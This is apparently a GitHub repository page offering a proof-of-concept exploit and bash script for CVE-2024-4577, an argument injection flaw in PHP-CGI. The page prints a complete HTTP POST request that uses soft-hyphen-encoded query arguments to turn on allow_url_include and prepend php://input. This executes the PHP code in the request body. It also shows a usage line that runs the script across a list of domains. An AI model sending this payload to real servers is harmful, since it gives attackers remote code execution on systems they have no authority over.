Skip to content

11whoami99/CVE-2024-4577

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-4577, Argument Injection in PHP-CGI

./CVE-2024-4577.sh /path/to/domains-list

POC :

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?> 

448002152_980199013569536_7597209283143282849_n

About

POC & $BASH script for CVE-2024-4577

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages